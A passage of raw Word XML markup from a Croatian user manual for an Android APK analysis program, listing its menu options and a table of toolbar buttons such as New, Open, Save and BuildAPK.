        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Meni omogućuje sljedeće opcije:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>File(F)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> – pruža mogućnosti otvaranja nove .apk datoteka, otvaranja spremljene analize, spremanja analize te izlaska iz programa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Edit(E)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> – pruža skup naredbi za rad s textom (Undo, Cut, Copy, Paste, All)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Tools(T)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> – pruža opcije traženja teksta te postavki Call in/out što će biti objašnjeno u nastavku teksta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Setting(S)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> – pruža opciju postavki programa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Help(H)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> – pruža informacije o tvorcima programa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D82E6E" w:rsidRDefault="00B35A13" w:rsidP="00D82E6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5174615" cy="191135"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="2" name="Slika 2" descr="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4615" cy="191135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00327E2E" w:rsidRPr="00327E2E" w:rsidRDefault="00327E2E" w:rsidP="00D82E6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 3.2. Meni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc406756488"/>
      <w:bookmarkStart w:id="34" w:name="_Toc406756601"/>
      <w:r w:rsidRPr="003B3B23">
        <w:t>Glavna alatna traka</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Funkcionalnosti glavne alatne trake su navedene u tablici 3.</w:t>
      </w:r>
      <w:r w:rsidR="00D82E6E">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>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2311"/>
        <w:gridCol w:w="2328"/>
        <w:gridCol w:w="2314"/>
        <w:gridCol w:w="2334"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B3B23" w:rsidTr="001A1A6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ikona u alatnoj traci</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ime stavke alatne trake</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pristup stavci preko menija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Opis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B3B23" w:rsidTr="001A1A6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00B35A13" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="200660" cy="200660"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
                  <wp:docPr id="3" name="Slika 3" descr="Glavna traka -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vna traka - N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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="00923678">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>New(N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="00923678">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File -&gt; New</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="00923678">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Otvaranje nove .apk datoteke</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B3B23" w:rsidTr="001A1A6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00B35A13" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="200660" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
                  <wp:docPr id="4" name="Slika 4" descr="Glavna traka -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vna traka - OP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60" cy="180975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Open(O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File -&gt; Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Otvaranje analize</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B3B23" w:rsidTr="001A1A6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00B35A13" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="200660" cy="200660"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
                  <wp:docPr id="5" name="Slika 5" descr="Glavna traka -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vna traka - SA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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Save(S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File -&gt; Save</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Spremanje analize</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B3B23" w:rsidTr="001A1A6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00B35A13" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="200660" cy="200660"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
                  <wp:docPr id="6" name="Slika 6" descr="Glavna traka - BACK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vna traka - BACKWA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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Backward</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00257A5C" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pomak na prethodnu analizu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B3B23" w:rsidTr="001A1A6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00B35A13" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="200660" cy="200660"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
                  <wp:docPr id="7" name="Slika 7" descr="Glavna traka -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vna traka - FORW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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Forward</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00257A5C" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pomak na sljedeću analizu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B3B23" w:rsidTr="001A1A6B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00B35A13" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="200660" cy="200660"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
                  <wp:docPr id="8" name="Slika 8" descr="Glavna traka - BUILD A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avna traka - BUILD AP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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>BuildAPK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="00257A5C" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003B3B23" w:rsidRPr="001A1A6B" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A1A6B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Izgradnja APK-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003B3B23" w:rsidRPr="00D82E6E" w:rsidRDefault="00386984" w:rsidP="00D82E6E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Tablica 3.1.</w:t>
      </w:r>
      <w:r w:rsidR="00923678">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Funkcionalnosti glavne trake</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
